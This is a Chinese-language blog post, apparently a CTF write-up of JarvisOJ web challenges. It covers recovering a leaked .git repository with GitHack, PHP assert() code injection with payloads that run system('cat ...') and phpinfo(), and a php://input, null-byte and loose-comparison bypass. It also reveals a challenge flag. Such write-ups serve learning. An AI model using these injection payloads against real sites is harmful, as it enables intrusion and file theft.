<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="渗透练习," />










<meta name="description" content="1. api调用题目writerup链接:http://grassgrass.top/2017/12/14/XXE%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E5%8F%8A%E5%AE%9E%E9%99%85%E5%BA%94%E7%94%A8/#more 2. babyphp题目链接: http://web.jarvisoj.com:32798/ 当前大量开发人">
<meta name="keywords" content="渗透练习">
<meta property="og:type" content="article">
<meta property="og:title" content="JarvisOj平台做题总结-2">
<meta property="og:url" content="http://grassgrass.top/2018/02/21/JarvisOj平台做题总结-2/index.html">
<meta property="og:site_name" content="Grassgrass&#39;s Blog">
<meta property="og:description" content="1. api调用题目writerup链接:http://grassgrass.top/2017/12/14/XXE%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E5%8F%8A%E5%AE%9E%E9%99%85%E5%BA%94%E7%94%A8/#more 2. babyphp题目链接: http://web.jarvisoj.com:32798/ 当前大量开发人">
<meta property="og:image" content="http://grassgrass.top/2018/02/21/JarvisOj平台做题总结-2/1.jpg">
<meta property="og:image" content="http://grassgrass.top/2018/02/21/JarvisOj平台做题总结-2/2.jpg">
<meta property="og:image" content="http://grassgrass.top/2018/02/21/JarvisOj平台做题总结-2/3.jpg">
<meta property="og:image" content="http://grassgrass.top/2018/02/21/JarvisOj平台做题总结-2/4.jpg">
<meta property="og:image" content="http://grassgrass.top/2018/02/21/JarvisOj平台做题总结-2/5.jpg">
<meta property="og:updated_time" content="2018-03-01T11:39:35.246Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="JarvisOj平台做题总结-2">
<meta name="twitter:description" content="1. api调用题目writerup链接:http://grassgrass.top/2017/12/14/XXE%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E5%8F%8A%E5%AE%9E%E9%99%85%E5%BA%94%E7%94%A8/#more 2. babyphp题目链接: http://web.jarvisoj.com:32798/ 当前大量开发人">
<meta name="twitter:image" content="http://grassgrass.top/2018/02/21/JarvisOj平台做题总结-2/1.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://grassgrass.top/2018/02/21/JarvisOj平台做题总结-2/"/>





  <title>JarvisOj平台做题总结-2 | Grassgrass's Blog</title>
  








</head>


<body itemscope itemtype="http://schema.org/WebPage" lang="">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Grassgrass's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Startseite
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            Über
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Kategorien
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archiv
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://grassgrass.top/2018/02/21/JarvisOj平台做题总结-2/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Grassgrass">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Grassgrass's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">JarvisOj平台做题总结-2</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Veröffentlicht am</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-02-21T13:59:35+08:00">
                2018-02-21
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">in</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/渗透练习/" itemprop="url" rel="index">
                    <span itemprop="name">渗透练习</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <hr>
<h2 id="1-api调用"><a href="#1-api调用" class="headerlink" title="1. api调用"></a>1. api调用</h2><p>题目writerup链接:<br><a href="http://grassgrass.top/2017/12/14/XXE%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E5%8F%8A%E5%AE%9E%E9%99%85%E5%BA%94%E7%94%A8/#more">http://grassgrass.top/2017/12/14/XXE%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E5%8F%8A%E5%AE%9E%E9%99%85%E5%BA%94%E7%94%A8/#more</a></p>
<h2 id="2-babyphp"><a href="#2-babyphp" class="headerlink" title="2. babyphp"></a>2. babyphp</h2><p>题目链接: <a href="http://web.jarvisoj.com:32798/" target="_blank" rel="noopener">http://web.jarvisoj.com:32798/</a></p>
<p>当前大量开发人员使用git进行版本控制，对站点自动部署。如果配置不当，可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。<br>GitHack是一个.git泄露利用测试脚本，通过泄露的文件，还原重建工程源代码。<br>Git信息泄露的危害很大，渗透测试人员、攻击者，可直接从源码获取敏感配置信息(如：邮箱，数据库)，也可以进一步审计代码，挖掘文件上传、SQL注射等安全漏洞。</p>
<p><img src="/2018/02/21/JarvisOj平台做题总结-2/1.jpg" alt=""></p>
<p>查看源码 </p>
<p><code>&lt;!--&lt;li &lt;?php if ($page == &quot;flag&quot;) { ?&gt;class=&quot;active&quot;&lt;?php } ?&gt;&gt;&lt;a href=&quot;?page=flag&quot;&gt;My secrets&lt;/a&gt;&lt;/li&gt; --&gt;</code><br>由提示大概知道是要使page传参为flag</p>
<p>根据提示判断是git源码泄露: <a href="http://web.jarvisoj.com:32798/.git" target="_blank" rel="noopener">http://web.jarvisoj.com:32798/.git</a></p>
<p>返回报错403，可以确定是.git文件泄露<br><img src="/2018/02/21/JarvisOj平台做题总结-2/2.jpg" alt=""></p>
<p>用Githack（git泄露脚本）获取网站文件<br><img src="/2018/02/21/JarvisOj平台做题总结-2/3.jpg" alt=""></p>
<p>发现了flag文件，但是是空的<br>找到index.php，根据源代码构造绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if (isset($_GET[&apos;page&apos;])) &#123; </span><br><span class="line">	$page = $_GET[&apos;page&apos;];#</span><br><span class="line">&#125; else &#123;</span><br><span class="line">	$page = &quot;home&quot;;</span><br><span class="line">&#125;</span><br><span class="line">$file = &quot;templates/&quot; . $page . &quot;.php&quot;;</span><br><span class="line">assert(&quot;strpos(&apos;$file&apos;, &apos;..&apos;) === false&quot;) or die(&quot;Detected hacking attempt!&quot;);</span><br><span class="line">#此处没有限制传入page参数，所以造成了注入漏洞，思路是闭合strops函数读取flag文件</span><br><span class="line">assert(&quot;file_exists(&apos;$file&apos;)&quot;) or die(&quot;That file doesn&apos;t exist!&quot;);</span><br><span class="line">#则限制了该文件需要在templates文件夹中，否则返回错误</span><br><span class="line">#assert()简介：判断一个表达式是否成立。返回true or false；当参数为字符串时，会被当作php代码执行。</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>闭合strops函数然后使用file_get_contents函数读取flag；或者使用system函数输出flag。</p>
<p>由于文件是utf-8编码，所以再变换一次字符编码则得到payload。（记得要加上#或者//注释掉后面的‘.php’）</p>
<p>进入phpinfo界面则证明出现漏洞<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?page=&apos;,&apos;&apos;..&apos;)===False%20and%20phpinfo();//</span><br></pre></td></tr></table></figure></p>
<h6 id="payload"><a href="#payload" class="headerlink" title="payload:"></a>payload:</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/?page=&apos;,&apos;..&apos;)===False%20and%20system(%27cat%20templates/flag.php%27);//</span><br><span class="line"></span><br><span class="line">/?page=&apos;,&apos;..&apos;)===False%20and%20print_r(file_get_contents(%27templates/flag.php%27));//</span><br></pre></td></tr></table></figure>
<p>取得flag：<br>&lt;?php<br>// TODO<br>//$FLAG = ‘61dctf{8e_careful_when_us1ng_ass4rt}’;<br>?&gt;<br><img src="/2018/02/21/JarvisOj平台做题总结-2/4.jpg" alt=""></p>
<h2 id="3-in-a-mess"><a href="#3-in-a-mess" class="headerlink" title="3. in a mess"></a>3. in a mess</h2><p>题目链接：<a href="http://web.jarvisoj.com:32780/index.php?id=1" target="_blank" rel="noopener">http://web.jarvisoj.com:32780/index.php?id=1</a></p>
<p>查看源代码根据提示进入index.phps网页<br>可以看出index.phps是index.php的源代码</p>
<p>依旧是构造绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">error_reporting(0);</span><br><span class="line">echo &quot;&lt;!--index.phps--&gt;&quot;;</span><br><span class="line"></span><br><span class="line">if(!$_GET[&apos;id&apos;])</span><br><span class="line">&#123;</span><br><span class="line">	header(&apos;Location: index.php?id=1&apos;);#header()函数：重定向浏览器实现页面跳转</span><br><span class="line">	exit();</span><br><span class="line">&#125;</span><br><span class="line">#header()函数：重定向浏览器实现页面跳转，页面重定向为id=1</span><br><span class="line">$id=$_GET[&apos;id&apos;];</span><br><span class="line">$a=$_GET[&apos;a&apos;];</span><br><span class="line">$b=$_GET[&apos;b&apos;];</span><br><span class="line">if(stripos($a,&apos;.&apos;))</span><br><span class="line">&#123;</span><br><span class="line">	echo &apos;Hahahahahaha&apos;;</span><br><span class="line">	return ;</span><br><span class="line">&#125;</span><br><span class="line">#stripos函数是用于查找&quot;.&quot;出现的位置，a用伪协议php://input</span><br><span class="line">$data = @file_get_contents($a,&apos;r&apos;);</span><br><span class="line">#file_get_contents() 函数把整个文件读入一个字符串中。</span><br><span class="line">#两种做法一种是在本地写一个文件然后上传在自己的服务器上，然后根据10进制ip绕过（这个操作不会= =）；二是用php伪协议postdata这一段数据过去（php://input可以读取没有处理的post数据）</span><br><span class="line"></span><br><span class="line">if($data==&quot;1112 is a nice lab!&quot; and $id==0 and strlen($b)&gt;5 and eregi(&quot;111&quot;.substr($b,0,1),&quot;1114&quot;) and substr($b,0,1)!=4)</span><br><span class="line">&#123;</span><br><span class="line">	require(&quot;flag.txt&quot;);</span><br><span class="line">&#125;</span><br><span class="line">#eregi，int eregi(string pattern, string string, [array regs]); ----字符串比对解析，与大小写无关。</span><br><span class="line"> #substr() 函数返回字符串的一部分。</span><br><span class="line"> #eregi(&quot;111&quot;,substr($b,0,1)，&quot;1114&quot;)=1；当$b存在时会报错且b的长度应大于5，eregi遇见%00终止</span><br><span class="line"> #id==0弱类型比较，传入id=0a（传入0时视为空= =）</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">	print &quot;work harder!harder!harder!&quot;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>故payload如下：<a href="http://web.jarvisoj.com:32780/index.php?id=0a&amp;a=php://input&amp;b=%0011111，" target="_blank" rel="noopener">http://web.jarvisoj.com:32780/index.php?id=0a&amp;a=php://input&amp;b=%0011111，</a><br>post过去的数据为1112 is a nice lab!</p>
<p><img src="/2018/02/21/JarvisOj平台做题总结-2/5.jpg" alt=""><br>emmmm还没写完qwq</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/渗透练习/" rel="tag"># 渗透练习</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/02/11/机器学习-安装sklearn出现的小问题/" rel="next" title="机器学习-安装sklearn出现的小问题">
                <i class="fa fa-chevron-left"></i> 机器学习-安装sklearn出现的小问题
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Inhaltsverzeichnis
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Übersicht
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Grassgrass</p>
              <p class="site-description motion-element" itemprop="description">一只正在努力学习的咸鱼美少女</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">Artikel</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">Kategorien</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">Tags</span>
                
              </div>
            

          </nav>

          

          <div class="links-of-author motion-element">
            
          </div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://sancrane.top/" title="sancrane" target="_blank">sancrane</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://Dfault0.top/" title="Dfault0" target="_blank">Dfault0</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://se8s0n.github.io/" title="se8s0n" target="_blank">se8s0n</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-api调用"><span class="nav-number">1.</span> <span class="nav-text">1. api调用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-babyphp"><span class="nav-number">2.</span> <span class="nav-text">2. babyphp</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#payload"><span class="nav-number">2.0.0.0.1.</span> <span class="nav-text">payload:</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-in-a-mess"><span class="nav-number">3.</span> <span class="nav-text">3. in a mess</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Grassgrass</span>

  
</div>


  <div class="powered-by">Erstellt mit  <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.3</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

  
  
		<script type="text/javascript" color="107,142,35" opacity='0.7' zIndex="-2"  src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  

</body>
</html>
